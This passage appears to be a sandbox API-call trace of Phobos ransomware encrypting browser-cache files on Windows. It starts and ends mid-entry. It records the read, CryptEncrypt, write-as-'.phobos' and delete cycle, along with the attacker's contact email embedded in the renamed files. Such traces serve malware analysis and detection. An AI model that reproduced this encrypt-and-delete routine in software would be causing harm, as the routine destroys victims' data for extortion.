CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0184.667] CryptDestroyKey (hKey=0xa328a8) returned 1 [0184.667] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0184.667] CryptDestroyKey (hKey=0xa327e8) returned 1 [0184.667] CloseHandle (hObject=0xb8) returned 1 [0184.667] CloseHandle (hObject=0x130) returned 1 [0184.668] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\modernizr[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\modernizr[1].js")) returned 1 [0184.669] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0184.669] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\MSNIdSync[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\msnidsync[1].js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0184.669] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=3781) returned 1 [0184.669] CloseHandle (hObject=0x130) returned 1 [0184.669] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\MSNIdSync[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\msnidsync[1].js")) returned 0x2020 [0184.670] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\MSNIdSync[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\msnidsync[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.670] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\MSNIdSync[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\msnidsync[1].js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0184.670] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.670] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.670] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\MSNIdSync[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\msnidsync[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0184.670] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0184.671] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.671] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xec5, lpOverlapped=0x0) returned 1 [0184.712] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xed0, dwBufLen=0xed0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xed0) returned 1 [0184.712] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xed0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xed0, lpOverlapped=0x0) returned 1 [0184.713] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0184.713] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.713] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0184.713] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0184.713] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0184.713] CryptDestroyKey (hKey=0xa327e8) returned 1 [0184.713] CloseHandle (hObject=0x130) returned 1 [0184.713] CloseHandle (hObject=0xb8) returned 1 [0184.713] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\MSNIdSync[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\msnidsync[1].js")) returned 1 [0184.714] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0184.714] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\player[2].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\player[2].js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0184.715] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=24388) returned 1 [0184.716] CloseHandle (hObject=0xb8) returned 1 [0184.716] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\player[2].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\player[2].js")) returned 0x2020 [0184.716] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\player[2].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\player[2].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.716] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\player[2].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\player[2].js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0184.716] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.716] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.716] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\player[2].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\player[2].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0184.717] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0184.717] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.717] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x5f44, lpOverlapped=0x0) returned 1 [0184.760] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5f50, dwBufLen=0x5f50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5f50) returned 1 [0184.760] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x5f50, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x5f50, lpOverlapped=0x0) returned 1 [0184.761] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32aa8) returned 1 [0184.761] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.761] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0184.761] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0184.761] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0184.761] CryptDestroyKey (hKey=0xa327e8) returned 1 [0184.761] CloseHandle (hObject=0xb8) returned 1 [0184.761] CloseHandle (hObject=0x130) returned 1 [0184.761] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\player[2].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\player[2].js")) returned 1 [0184.762] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0184.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\thankyou[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\thankyou[1].htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0184.763] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=32858) returned 1 [0184.763] CloseHandle (hObject=0x130) returned 1 [0184.763] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\thankyou[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\thankyou[1].htm")) returned 0x2020 [0184.763] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\thankyou[1].htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\thankyou[1].htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.763] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\thankyou[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\thankyou[1].htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0184.763] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.764] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\thankyou[1].htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\thankyou[1].htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0184.764] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0184.764] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.764] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x805a, lpOverlapped=0x0) returned 1 [0184.889] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8060, dwBufLen=0x8060 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8060) returned 1 [0184.890] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x8060, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x8060, lpOverlapped=0x0) returned 1 [0184.891] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32aa8) returned 1 [0184.891] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.891] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0184.891] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0184.891] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0184.891] CryptDestroyKey (hKey=0xa327e8) returned 1 [0184.891] CloseHandle (hObject=0x130) returned 1 [0184.891] CloseHandle (hObject=0xb8) returned 1 [0184.891] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\thankyou[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\thankyou[1].htm")) returned 1 [0184.892] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0184.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0184.893] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=344064) returned 1 [0184.893] CloseHandle (hObject=0xb8) returned 1 [0184.893] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\index.dat")) returned 0x2026 [0184.893] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.893] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0184.893] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.893] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.893] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0184.893] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0184.893] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.893] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x54000, lpOverlapped=0x0) returned 1 [0184.980] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x54010, dwBufLen=0x54010 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x54010) returned 1 [0184.985] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x54010, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x54010, lpOverlapped=0x0) returned 1 [0184.991] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0184.991] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.991] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0184.991] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.991] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0184.991] CryptDestroyKey (hKey=0xa327e8) returned 1 [0184.991] CloseHandle (hObject=0xb8) returned 1 [0184.991] CloseHandle (hObject=0x130) returned 1 [0184.991] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\index.dat")) returned 1 [0184.994] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0184.994] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\26158[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\26158[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0184.995] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49247) returned 1 [0184.995] CloseHandle (hObject=0x130) returned 1 [0184.995] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\26158[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\26158[1].png")) returned 0x2020 [0184.995] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\26158[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\26158[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.995] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\26158[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\26158[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0184.995] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.995] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.995] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\26158[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet 